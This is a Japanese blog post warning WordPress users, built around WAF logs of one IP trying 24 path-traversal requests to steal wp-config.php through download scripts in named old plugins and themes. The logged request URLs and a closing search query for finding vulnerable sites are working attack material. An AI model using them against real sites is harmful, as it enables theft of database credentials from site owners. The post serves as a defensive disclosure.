危険なWPプラグインやテーマ。wp-config.phpを違法ダウンロードしているWAFログ

wp-config.phpのハッキングを検知していたのでご報告。
ドメインは伏せ字にしてます。

セキュリティホールがあるダウンロード機能が付いたプラグインがサーバーにあるとwp-config.phpが盗まれます。
だいぶ古いプラグインで、公開停止しているものばかりでしたが、これらのプラグインをインストールしている人はご注意を。

テーマも日本ではだれも使っていないと思われるテーマですが、テーマ中にdownload.phpみたいなファイルがあったら変えた方がいいかもですね。

WP Vault – WordPress plugin | WordPress.org
https://wordpress.org/plugins/wp-vault/
1 2018/12/12 06:11:11 xxx.jp/?wpv-image=../wp-config.php 109.120.167.1
wordpress-wpconfig

WordPress Plugin ShortCode 0.2.3 – Local File Inclusion
2 2018/12/12 06:11:11 xxx.jp/wp-content/force-download.php?file=../wp-config.php 109.120.167.1
wordpress-wpconfig

Advanced uploader
Advanced uploader
3 2018/12/12 06:11:12 xxx.jp/wp-content/plugins/advanced-uploader/upload.php?destinations=../../../../../../../../../wp-config.php%00 109.120.167.1
traversal-1

http://codecanyon.net/item/ajax-store-locator-wordpress/5293356
4 2018/12/12 06:11:13 xxx.jp/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php 109.120.167.1
wordpress-wpconfig

CodeArt – Google MP3 Player – WordPress plugin | WordPress.org
https://wordpress.org/plugins/google-mp3-audio-player/
5 2018/12/12 06:11:14 xxx.jp/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php 109.120.167.1
wordpress-wpconfig

WP Custom Pages – WordPress plugin | WordPress.org
WordPress Plugin Custom Pages 0.5.0.1 – Local File Inclusion
6 2018/12/12 06:11:18 xxx.jp/wp-content/plugins/wp-custom-pages/wp-download.php?download=../../../wp-config.php 109.120.167.1
wordpress-wpconfig

7 2018/12/12 06:11:21 xxx.jp/wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php 109.120.167.1
wordpress-wpconfig
8 2018/12/12 06:11:22 xxx.jp/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php 109.120.167.1
wordpress-wpconfig
9 2018/12/12 06:11:23 xxx.jp/wp-content/themes/SMWF/inc/download.php?file=../wp-config.php 109.120.167.1
wordpress-wpconfig
10 2018/12/12 06:11:23 xxx.jp/wp-content/themes/TheLoft/download.php?file=../../../wp-config.php 109.120.167.1
wordpress-wpconfig
11 2018/12/12 06:11:24 xxx.jp/wp-content/themes/acento/includes/view-pdf.php?download=1&file=../../../../wp-config.php 109.120.167.1
wordpress-wpconfig
12 2018/12/12 06:11:25 xxx.jp/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php 109.120.167.1
wordpress-wpconfig
13 2018/12/12 06:11:26 xxx.jp/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php 109.120.167.1
wordpress-wpconfig
14 2018/12/12 06:11:26 xxx.jp/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php 109.120.167.1
wordpress-wpconfig
15 2018/12/12 06:11:27 xxx.jp/wp-content/themes/epic/includes/download.php?file=wp-config.php 109.120.167.1
wordpress-wpconfig
16 2018/12/12 06:11:28 xxx.jp/wp-content/themes/felis/download.php?file=../wp-config.php 109.120.167.1
wordpress-wpconfig
17 2018/12/12 06:11:28 xxx.jp/wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php 109.120.167.1
wordpress-wpconfig
18 2018/12/12 06:11:29 xxx.jp/wp-content/themes/lote27/download.php?download=../../../wp-config.php 109.120.167.1
wordpress-wpconfig
19 2018/12/12 06:11:29 xxx.jp/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php 109.120.167.1
wordpress-wpconfig
20 2018/12/12 06:11:30 xxx.jp/wp-content/themes/markant/download.php?file=../../wp-config.php 109.120.167.1
wordpress-wpconfig
21 2018/12/12 06:11:31 xxx.jp/wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php 109.120.167.1
wordpress-wpconfig
22 2018/12/12 06:11:31 xxx.jp/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php 109.120.167.1
wordpress-wpconfig
23 2018/12/12 06:11:32 xxx.jp/wp-content/themes/urbancity/lib/scripts/download.php?file=wp-config.php 109.120.167.1
wordpress-wpconfig
24 2018/12/12 06:11:33 xxx.jp/wp-content/themes/yakimabait/download.php?file=./wp-config.php 109.120.167.1
wordpress-wpconfig

たとえば、Google検索で
Index of themes/yakimabait/download.php – Google 検索
と検索すると、攻撃対象サイトが出てきます。